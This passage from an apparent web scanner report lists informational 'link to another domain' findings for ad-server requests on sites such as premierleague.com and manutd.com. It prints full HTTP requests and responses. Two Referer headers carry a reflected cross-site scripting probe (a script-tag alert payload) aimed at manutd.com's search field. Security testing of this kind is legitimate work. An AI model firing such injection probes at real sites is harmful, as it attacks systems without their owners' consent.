GET /imp?anmember=514&anprice=&Z=300x250&s=1722409&r=1&_salt=1348403289&u=http%3A%2F%2Fwww.igougo.com%2Fabout%2F&u=http://www.igougo.com/about/ HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.igougo.com/about/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:53:04 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0343.rm.sp2
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 01:53:04 GMT
Pragma: no-cache
Content-Length: 392
Content-Type: application/x-javascript
Age: 0
Proxy-Connection: close

// PubMatic ad tag (iFrame wrapped) : igougo_300X250_ATF | http://www.igougo.com | 300 x 250 Medium Rectangle | Audience Science PCI -->
document.write('<iframe width="300" scrolling="no" height="250" frameborder="0" src="http://ads.pubmatic.com/HostedDefaultTags/26620/26621/21556/559/adtag.html" marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true" ></iframe>
...[SNIP]...

19.89. http://ads.pointroll.com/PortalServe/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /PortalServe/?pid=1399334Q81720110831160016&flash=10&time=0|18:49|-5&redir=http://cdslog.contextweb.com/CDSLogger/L.aspx?q=C~538936~3448~59764~134043~106934~3~345~25~premierleague.com~2~8~1~0~2~1~-HAZoarNoKZDius-txPklIg7Z5oU_7wk6upA9MEPZ1w^~19~2~5ZvoQhA3FQCr~PpAVCxNh2PJr~1~1~1~~http%3A%2F%2Fbh.contextweb.com%2Fbh%2Fset.aspx%3Faction%3Dadd%26advid%3D3448%26token%3DTTCL1%26rurl%3D$CTURL$&data=345&r=0.26698742574080825 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Headlines/0,,12306~2469333,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=FC84F463-F810-4805-B5C6-DA875B835084; PRbu=ErB40RtCA; PRvt=CFJ9xErENUwPwYAcUBBeJ6TErNHYxA5IBd7BCeJ5DErTb9CAIFAC9BBeJ7WErTb9avgKAAGBBeJNRErllKsxwcASKBBe; PRgo=BBBAAsJvCBVBF4FRCDhFS!B; PRimp=59AE0400-B34A-1C1C-0309-3510048A0101; PRca=|AJoR*343:1|AKjB*15:2|AK9q*1646:2|AK73*1646:1|AKdX*1153:2|AKfC*298:1|AK8l*9320:1|AJtM*1737:2|AJsM*154:1|AKln*9320:3|AKgy*39173:1|AKfq*9:2|AKcV*1774:3|#; PRcp=|AJoRAAF7:1|AKjBAAF7:1|AKjBAAAP:1|AK9qAA08:2|AK73AA08:1|AKdXAASb:2|AKfCAAEo:1|AK8lAC0U:1|AJtMAA2B:2|AJsMAAC4:1|AKlnAC0U:3|AKgyAKLp:1|AKfqAAQ0:1|AKfqAAAJ:1|AKcVAA2c:3|#; PRpl=|FiNl:1|FwPI:1|FwO9:1|FeMB:1|FeMC:1|FdKz:1|FjZG:1|Fj1N:1|FnKl:1|Fgi2:1|FrMI:1|FrMW:1|F2Bj:1|FrlJ:3|Fqr0:1|Fqqc:1|Fqqq:1|Fhqf:3|#; PRcr=|Fz7o:1|GYaN:2|GRns:1|GRno:1|GRQ2:1|GUPB:1|GUPA:1|GVWz:1|GWPi:1|GJ9J:1|GMBD:1|GMud:1|GW7X:3|GV2B:1|GV12:2|GSur:3|#; PRpc=|FiNlFz7o:1|FwPIGYaN:1|FwO9GYaN:1|FeMBGRns:1|FeMCGRno:1|FdKzGRQ2:1|FjZGGUPB:1|Fj1NGUPA:1|FnKlGVWz:1|Fgi2GWPi:1|FrMIGJ9J:1|FrMWGMBD:1|F2BjGMud:1|FrlJGW7X:3|Fqr0GV2B:1|FqqcGV12:1|FqqqGV12:1|FhqfGSur:3|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 02 Oct 2011 23:49:37 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache
Content-type: text/html
Content-length: 4218
Set-Cookie:PRvt=CGJ9xErENUwPwYAcUBBeJ6TErNHYxA5IBd7BCeJ5DErTb9CAIFAC9BBeJ7WErTb9avgKAAGBBeJNRErllKsxwcASKBBeKG9ErlmC1SzbAB3BAe;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRgo=BBBAAsJvCBVBF4FRCDhFS!B;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=59AE0400-D582-DB2C-030A-1BD000770100; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AKlp*1278:2|AJoR*343:1|AKjB*15:2|AK9q*1646:2|AK73*1646:1|AKdX*1153:2|AKfC*298:1|AK8l*9320:1|AJtM*1737:2|AJsM*154:1|AKln*9320:3|AKgy*39173:1|AKfq*9:2|AKcV*1774:3|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AKlpAAUc:2|AJoRAAF7:1|AKjBAAF7:1|AKjBAAAP:1|AK9qAA08:2|AK73AA08:1|AKdXAASb:2|AKfCAAEo:1|AK8lAC0U:1|AJtMAA2B:2|AJsMAAC4:1|AKlnAC0U:3|AKgyAKLp:1|AKfqAAQ0:1|AKfqAAAJ:1|AKcVAA2c:3|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|FsBu:2|FiNl:1|FwPI:1|FwO9:1|FeMB:1|FeMC:1|FdKz:1|FjZG:1|Fj1N:1|FnKl:1|Fgi2:1|FrMI:1|FrMW:1|F2Bj:1|FrlJ:3|Fqr0:1|Fqqc:1|Fqqq:1|Fhqf:3|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|GWZl:2|Fz7o:1|GYaN:2|GRns:1|GRno:1|GRQ2:1|GUPB:1|GUPA:1|GVWz:1|GWPi:1|GJ9J:1|GMBD:1|GMud:1|GW7X:3|GV2B:1|GV12:2|GSur:3|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpc=|FsBuGWZl:2|FiNlFz7o:1|FwPIGYaN:1|FwO9GYaN:1|FeMBGRns:1|FeMCGRno:1|FdKzGRQ2:1|FjZGGUPB:1|Fj1NGUPA:1|FnKlGVWz:1|Fgi2GWPi:1|FrMIGJ9J:1|FrMWGMBD:1|F2BjGMud:1|FrlJGW7X:3|Fqr0GV2B:1|FqqcGV12:1|FqqqGV12:1|FhqfGSur:3|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

var prwin=window;if(!prwin.prRefs){prwin.prRefs={};};prwin.prSet=function(n,v){if((typeof(n)!='undefined')&&(typeof(v)!='undefined')){prwin.prRefs[n]=v;}};prwin.prGet=function(n){if(typeof(prwin.prRef
...[SNIP]...
</style><object id='prfls59AE0400D582DB2C030A1BD000770100' name='prfls59AE0400D582DB2C030A1BD000770100' classid=clsid:D27CDB6E-AE6D-11cf-96B8-444553540000 codebase=http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=10,0,0,0 width='300' height='250' style='width:300px;height:250px'><param name='movie' value='http://speed.pointroll.com/PointRoll/Media/Banners/ToyoTires/894167/ProxesSweeps_300x250_Flash_r01.swf?PRCampID=41405&PRPubID=cntxtwb&PRAdSize=300x250&PRFormat=FL&PRAd=151613
...[SNIP]...

19.90. http://adserver.adtech.de/addyn%7C3.0%7C327%7C2812308%7C0%7C170%7CADTECH

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /addyn%7C3.0%7C327%7C2812308%7C0%7C170%7CADTECH

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /addyn%7C3.0%7C327%7C2812308%7C0%7C170%7CADTECH;loc=100;target=_blank;sub1=[subst];grp=[group];misc=1317599889542 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Home
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 18961

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
left+'px;'+(!AT_FAKEPOPUP_start_opened?"display:none;":"")+'">';
}
if (ShockMode && AT_FLASH){
if (AT_EXPANDABLE && AT_EXPANDABLE !='false') AT_WIDTH_HEIGHT = "width=300 height=250";
adtech_flashinc+='<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://active.macromedia.com/flash2/cabs/swflash.cab#version=5,0,0,0" id="AT_FLASHO2812308" name="AT_FLASHO2812308" '+AT_WIDTH_HEIGHT+'>';
adtech_flashinc+='<param name=movie va'+'lue="'+AT_FLASH+ AT_VARSTRING +'&CURRENTDOMAIN='+AT_CURRENTDOMAIN+ '">
...[SNIP]...

19.91. http://adserver.adtech.de/addyn%7C3.0%7C327%7C2812309%7C0%7C1%7CADTECH

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /addyn%7C3.0%7C327%7C2812309%7C0%7C1%7CADTECH

Issue detail

The page was loaded from a URL containing a query string. The response contains a link to another domain.

Request

GET /addyn%7C3.0%7C327%7C2812309%7C0%7C1%7CADTECH;loc=100;target=_blank;sub1=[subst];grp=[group];misc=1317599329835 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Home/0,,12306,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 18902

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
_left+'px;'+(!AT_FAKEPOPUP_start_opened?"display:none;":"")+'">';
}
if (ShockMode && AT_FLASH){
if (AT_EXPANDABLE && AT_EXPANDABLE !='false') AT_WIDTH_HEIGHT = "width=468 height=60";
adtech_flashinc+='<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://active.macromedia.com/flash2/cabs/swflash.cab#version=5,0,0,0" id="AT_FLASHO2812309" name="AT_FLASHO2812309" '+AT_WIDTH_HEIGHT+'>';
adtech_flashinc+='<param name=movie va'+'lue="'+AT_FLASH+ AT_VARSTRING +'&CURRENTDOMAIN='+AT_CURRENTDOMAIN+ '">
...[SNIP]...

19.92. http://adserver.adtech.de/addyn%7C3.0%7C327%7C2812326%7C0%7C1%7CADTECH

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /addyn%7C3.0%7C327%7C2812326%7C0%7C1%7CADTECH

Issue detail

The page was loaded from a URL containing a query string. The response contains a link to another domain.

Request

GET /addyn%7C3.0%7C327%7C2812326%7C0%7C1%7CADTECH;loc=100;target=_blank;sub1=[subst];grp=[group];misc=1317599377532 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Players/0,,12306,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 18902

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
_left+'px;'+(!AT_FAKEPOPUP_start_opened?"display:none;":"")+'">';
}
if (ShockMode && AT_FLASH){
if (AT_EXPANDABLE && AT_EXPANDABLE !='false') AT_WIDTH_HEIGHT = "width=468 height=60";
adtech_flashinc+='<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://active.macromedia.com/flash2/cabs/swflash.cab#version=5,0,0,0" id="AT_FLASHO2812326" name="AT_FLASHO2812326" '+AT_WIDTH_HEIGHT+'>';
adtech_flashinc+='<param name=movie va'+'lue="'+AT_FLASH+ AT_VARSTRING +'&CURRENTDOMAIN='+AT_CURRENTDOMAIN+ '">
...[SNIP]...

19.93. http://adserver.adtech.de/addyn%7C3.0%7C327%7C2816967%7C0%7C168%7CADTECH

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /addyn%7C3.0%7C327%7C2816967%7C0%7C168%7CADTECH

Issue detail

The page was loaded from a URL containing a query string. The response contains a link to another domain.

Request

GET /addyn%7C3.0%7C327%7C2816967%7C0%7C168%7CADTECH;loc=100;target=_blank;sub1=[subst];grp=[group];misc=1317599353462 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Headlines/0,,12306~2469333,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 475

document.write('<a href="http://adserver.adtech.de/?adlink|327|2816967|0|168|AdId=6109713;BnId=3;itime=599390602;sub1=[subst];" target=_blank><img src="http://aka-cdn-ns.adtech.de/images/17/Ad6109713St1Sz168Sq100173284V0Id3.gif" border=0 alt=" " width="120" height="600"></a>
...[SNIP]...

19.94. http://adserver.adtech.de/addyn%7C3.0%7C512%7C2042949%7C0%7C2384%7CADTECH

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /addyn%7C3.0%7C512%7C2042949%7C0%7C2384%7CADTECH

Issue detail

The page was loaded from a URL containing a query string. The response contains a link to another domain.

Request

GET /addyn%7C3.0%7C512%7C2042949%7C0%7C2384%7CADTECH;loc=100;target=_blank;key=key1+key2+key3+key4;misc=[timestamp];rdclick= HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.manutd.com/en.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 19421

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
left+'px;'+(!AT_FAKEPOPUP_start_opened?"display:none;":"")+'">';
}
if (ShockMode && AT_FLASH){
if (AT_EXPANDABLE && AT_EXPANDABLE !='false') AT_WIDTH_HEIGHT = "width=660 height=142";
adtech_flashinc+='<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://active.macromedia.com/flash2/cabs/swflash.cab#version=5,0,0,0" id="AT_FLASHO2046906" name="AT_FLASHO2046906" '+AT_WIDTH_HEIGHT+'>';
adtech_flashinc+='<param name=movie va'+'lue="'+AT_FLASH+ AT_VARSTRING +'&CURRENTDOMAIN='+AT_CURRENTDOMAIN+ '">
...[SNIP]...

19.95. http://adserver.adtech.de/addyn%7C3.0%7C999%7C3106021%7C0%7C168%7CADTECH

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /addyn%7C3.0%7C999%7C3106021%7C0%7C168%7CADTECH

Issue detail

The page was loaded from a URL containing a query string. The response contains a link to another domain.

Request

GET /addyn%7C3.0%7C999%7C3106021%7C0%7C168%7CADTECH;cookie=info;loc=100;target=_blank;key=key1+key2+key3+key4;grp=578;misc=1317599931265 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.manutd.com/en/Club/Sponsors.aspx?sponsorid={F745DA14-CB5E-4A81-816A-8DB410E47A75}
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 19174

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
left+'px;'+(!AT_FAKEPOPUP_start_opened?"display:none;":"")+'">';
}
if (ShockMode && AT_FLASH){
if (AT_EXPANDABLE && AT_EXPANDABLE !='false') AT_WIDTH_HEIGHT = "width=120 height=600";
adtech_flashinc+='<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://active.macromedia.com/flash2/cabs/swflash.cab#version=5,0,0,0" id="AT_FLASHO3106021" name="AT_FLASHO3106021" '+AT_WIDTH_HEIGHT+'>';
adtech_flashinc+='<param name=movie va'+'lue="'+AT_FLASH+ AT_VARSTRING +'&CURRENTDOMAIN='+AT_CURRENTDOMAIN+ '">
...[SNIP]...

19.96. http://adserver.adtech.de/addyn%7C3.0%7C999%7C3173523%7C0%7C477%7CADTECH

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /addyn%7C3.0%7C999%7C3173523%7C0%7C477%7CADTECH

Issue detail

The page was loaded from a URL containing a query string. The response contains a link to another domain.

Request

GET /addyn%7C3.0%7C999%7C3173523%7C0%7C477%7CADTECH;cookie=info;loc=100;target=_blank;key=key1+key2+key3+key4;grp=261;misc=1317599777599 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.manutd.com/Search-Results.aspx?qs=manutd_frontend&catTxt=&searchText=xss75931%3Cscript%3Ealert(document.location)%3C/script%3E14fb8fbf954
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 487

document.write('<a href="http://adserver.adtech.de/?adlink|999|3173523|0|477|AdId=6814195;BnId=3;itime=599780442;key=key1+key2+key3+key4;" target=_blank><img src="http://aka-cdn-ns.adtech.de/images/499/Ad6814195St1Sz477Sq101161089V0Id3.gif" border=0 alt=" " width="150" height="180"></a>
...[SNIP]...

19.97. http://adserver.adtech.de/addyn|3.0|512|2042949|0|2384|ADTECH

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /addyn|3.0|512|2042949|0|2384|ADTECH

Issue detail

The page was loaded from a URL containing a query string. The response contains a link to another domain.

Request

GET /addyn|3.0|512|2042949|0|2384|ADTECH;loc=100;target=_blank;key=key1+key2+key3+key4;misc=[timestamp];rdclick= HTTP/1.1
Host: adserver.adtech.de
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.manutd.com/Search-Results.aspx?qs=manutd_frontend&catTxt=&searchText=xss75931%3Cscript%3Ealert(document.location)%3C/script%3E14fb8fbf954
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 19421

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
left+'px;'+(!AT_FAKEPOPUP_start_opened?"display:none;":"")+'">';
}
if (ShockMode && AT_FLASH){
if (AT_EXPANDABLE && AT_EXPANDABLE !='false') AT_WIDTH_HEIGHT = "width=660 height=142";
adtech_flashinc+='<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://active.macromedia.com/flash2/cabs/swflash.cab#version=5,0,0,0" id="AT_FLASHO2046906" name="AT_FLASHO2046906" '+AT_WIDTH_HEIGHT+'>';
adtech_flashinc+='<param name=movie va'+'lue="'+AT_FLASH+ AT_VARSTRING +'&CURRENTDOMAIN='+AT_CURRENTDOMAIN+ '">
...[SNIP]...

19.98. http://afe.specificclick.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://afe.specificclick.net
Path:   /

Issue detail

The page was loaded from a URL containing a query string. The response contains links to other domains.

Request

GET /?l=24038&sz=728x90&wr=j&t=j&u=http%3A%2F%2Fdm.travelocity.com%2Fhtml.ng%2Fadsize%3D728x90%26site%3Dtravelocity%26cobrand%3DTRAVELOCITY%26locale%3Den%26area%3Dhotel%26dest%3DBOS%26paxa%3D0%26paxs%3D0%26paxc%3D0%26adloc%3DNA%26random%3D771852%26tile%3D128609801075344%26section%3Dresults&r=http%3A%2F%2Ftravel.travelocity.com%2Fhotel%2FHotelAvailability.do%3Bjsessionid%3D74C1C04EA1B1607D7CD2E1313B9B2779.p0617&rnd=876971 HTTP/1.1
Host: afe.specificclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://dm.travelocity.com/html.ng/adsize=728x90&site=travelocity&cobrand=TRAVELOCITY&locale=en&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&adloc=NA&random=771852&tile=128609801075344&section=results
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADVIVA=NOTRACK

Response

HTTP/1.1 200 OK
Server: WebStar 1.0
Cache-Control: no-store,no-cache,must-revalidate,post-check=0,pre-check=0
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: JSESSIONID=7223935ceaae2e8049f67e6c582a; Path=/
Content-Type: application/javascript;charset=ISO-8859-1
Date: Mon, 03 Oct 2011 00:15:01 GMT
Content-Length: 2104

document.write('<div style="z-index:10; position:relative; width:728px">'+'<scr'+'ipt language="JavaScript" type="text/javascript" src="http://view.atdmt.com/DWC/jview/352348532/direct/01?click=http:/
...[SNIP]...
<div style="z-index:2147483647; position:absolute; right:0px; top:0px; background:transparent; opacity:0.8; filter:alpha(opacity=80);"><a href="http://specificmedia.com/sites/privacy/?cid=178619&bid=1058368&lid=24038" target="_blank"><img src="http://cache.specificmedia.com/otherassets/ad_options_icon.png" style="border-style:none"></a></div></div>');
document.write('<img src="http://cache.specificmedia.com/creative/blank.gif?ts=20111002201501&cmxid=2101.020017861901058368xmc" style="display: none" height="1" width="1" border="0" />');var ord=Math.random()*10000000000000000;document.write("<img src='http://p.opt.fimserve.com/bht/?px=3140&v=1&rnd=" + ord + "' width='1' height='1' />");var ord=Math.random()*10000000000000000;document.write("<img src='http://ad.xtendmedia.com/pixel?id=983035&t=2' width='1' height='1' />");document.write('<img src="http://ad.yieldmanager.com/pixel?id=979001&t=2" width="1" height="1"/>');var ord=Math.random()*10000000000000000;document.write("<img src='http://pixel.rubiconproject.com/tap.php?v=5467' width='1' height='1' />");var ord=Math.random()*10000000000000000;document.write("<img src='http://tag.admeld.com/pixel?admeld_adprovider_id=5&_segment=93' width='1' height='1' />");var ord=Math.random()*10000000000000000;document.write("<img src='http://image2.pubmatic.com/AdServer/Pug?vcode=bz0xJnR5cGU9MSZjb2RlPTEzODQmdGw9NDMyMDA' width='1' height='1' />");var _comscore = _comscore || []; _comscore.push({ c1: "8", c2: "2101" ,c3: "1234567891234567891" }); (function() { var s = document.createElement("script"), el = document.getElementsByTagNam
...[SNIP]...

19.99. http://afe.specificclick.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://afe.specificclick.net
Path:   /

Issue detail

The page was loaded from a URL containing a query string. The response contains links to other domains.

Request

GET /?l=24040&sz=160x600&wr=j&t=j&u=http%3A%2F%2Fdm.travelocity.com%2Fhtml.ng%2Fadsize%3D160x600%26site%3Dtravelocity%26cobrand%3DTRAVELOCITY%26locale%3Den%26pagepos%3D2%26area%3Dhotel%26dest%3DBOS%26paxa%3D0%26paxs%3D0%26paxc%3D0%26random%3D771875%26tile%3D128609801075344%26section%3Dresults&r=http%3A%2F%2Ftravel.travelocity.com%2Fhotel%2FHotelAvailability.do%3Bjsessionid%3D74C1C04EA1B1607D7CD2E1313B9B2779.p0617&rnd=776731 HTTP/1.1
Host: afe.specificclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=771875&tile=128609801075344&section=results
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADVIVA=NOTRACK; JSESSIONID=720dd60e62eaaf2f7ea1bac32416

Response

HTTP/1.1 200 OK
Server: WebStar 1.0
Cache-Control: no-store,no-cache,must-revalidate,post-check=0,pre-check=0
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: JSESSIONID=7225bf6549db812c27087ae2f025; Path=/
Content-Type: application/javascript;charset=ISO-8859-1
Date: Mon, 03 Oct 2011 00:15:09 GMT
Content-Length: 2104

document.write('<div style="z-index:10; position:relative; width:160px">'+'<scr'+'ipt language="JavaScript" type="text/javascript" src="http://view.atdmt.com/DWC/jview/352348531/direct/01?click=http:/
...[SNIP]...
<div style="z-index:2147483647; position:absolute; right:0px; top:0px; background:transparent; opacity:0.8; filter:alpha(opacity=80);"><a href="http://specificmedia.com/sites/privacy/?cid=178619&bid=1058366&lid=24040" target="_blank"><img src="http://cache.specificmedia.com/otherassets/ad_options_icon.png" style="border-style:none"></a></div></div>');
